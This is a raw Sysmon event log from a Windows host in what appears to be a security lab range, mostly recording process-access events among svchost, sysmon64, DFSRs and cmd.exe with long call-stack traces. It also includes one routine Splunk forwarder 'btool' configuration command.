13:34:16.767{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001808Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.767{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001807Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.767{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001806Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.767{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001805Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.767{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001804Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.767{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001803Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.767{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E58-6005-4400-00000000A301}3900C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001802Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.767{59A5CD1D-8E58-6005-3C00-00000000A301}37083712C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{59A5CD1D-8E58-6005-4400-00000000A301}3900C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+14ab4|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d1d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001801Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.778{59A5CD1D-8E58-6005-4400-00000000A301}3900C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E58-6005-3C00-00000000A301}3708C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000001800Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.736{59A5CD1D-8E58-6005-4300-00000000A301}38603864C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001799Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.705{59A5CD1D-8E46-6005-1600-00000000A301}15442092C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+261b7|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001798Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.705{59A5CD1D-8E46-6005-1600-00000000A301}15442092C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+25d35|C:\Windows\system32\wbem\wmiprvsd.dll+2619d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000001797Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.705{59A5CD1D-8E46-6005-1600-00000000A301}15442092C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x80000000000000001796Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.705{59A5CD1D-8E46-6005-1600-00000000A301}15442092C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001795Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.705{59A5CD1D-8E46-6005-1600-00000000A301}15442092C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+264a1|C:\Windows\system32\wbem\wmiprvsd.dll+2669f|C:\Windows\system32\wbem\wmiprvsd.dll+25c4b|C:\Windows\system32\wbem\wmiprvsd.dll+27476|C:\Windows\system32\wbem\wmiprvsd.dll+27db2|C:\Windows\system32\wbem\wmiprvsd.dll+277c9|C:\Windows\system32\wbem\wmiprvsd.dll+26100|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x80000000000000001794Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.705{59A5CD1D-8E46-6005-1600-00000000A301}15442092C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+264a1|C:\Windows\system32\wbem\wmiprvsd.dll+2669f|C:\Windows\system32\wbem\wmiprvsd.dll+25c4b|C:\Windows\system32\wbem\wmiprvsd.dll+27476|C:\Windows\system32\wbem\wmiprvsd.dll+27db2|C:\Windows\system32\wbem\wmiprvsd.dll+277c9|C:\Windows\system32\wbem\wmiprvsd.dll+26100|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x80000000000000001793Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.705{59A5CD1D-8E56-6005-2F00-00000000A301}22763144C:\Windows\system32\DFSRs.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmidcprv.dll+163a4|C:\Windows\system32\wbem\wmidcprv.dll+166e0|C:\Windows\system32\wbem\wmidcprv.dll+abad|C:\Windows\system32\wbem\wmidcprv.dll+b57e|C:\Windows\system32\wmidcom.dll+58a6|C:\Windows\system32\wmidcom.dll+5464|C:\Windows\system32\wmidcom.dll+5495|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001792Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.689{59A5CD1D-8E46-6005-1600-00000000A301}15442092C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+261b7|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001791Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.689{59A5CD1D-8E46-6005-1600-00000000A301}15442092C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+25d35|C:\Windows\system32\wbem\wmiprvsd.dll+2619d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000001790Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.689{59A5CD1D-8E46-6005-1600-00000000A301}15442092C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x80000000000000001789Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.689{59A5CD1D-8E46-6005-1600-00000000A301}15442092C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001788Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.689{59A5CD1D-8E46-6005-1600-00000000A301}15442092C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+5a1b8|C:\Windows\system32\wbem\wmiprvsd.dll+35a49|C:\Windows\system32\wbem\wmiprvsd.dll+2807f|C:\Windows\system32\wbem\wmiprvsd.dll+29591|C:\Windows\system32\wbem\wmiprvsd.dll+292c2|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001787Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.689{59A5CD1D-8E46-6005-1600-00000000A301}15442092C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+264a1|C:\Windows\system32\wbem\wmiprvsd.dll+2669f|C:\Windows\system32\wbem\wmiprvsd.dll+25c4b|C:\Windows\system32\wbem\wmiprvsd.dll+27476|C:\Windows\system32\wbem\wmiprvsd.dll+27db2|C:\Windows\system32\wbem\wmiprvsd.dll+277c9|C:\Windows\system32\wbem\wmiprvsd.dll+26100|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x80000000000000001786Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 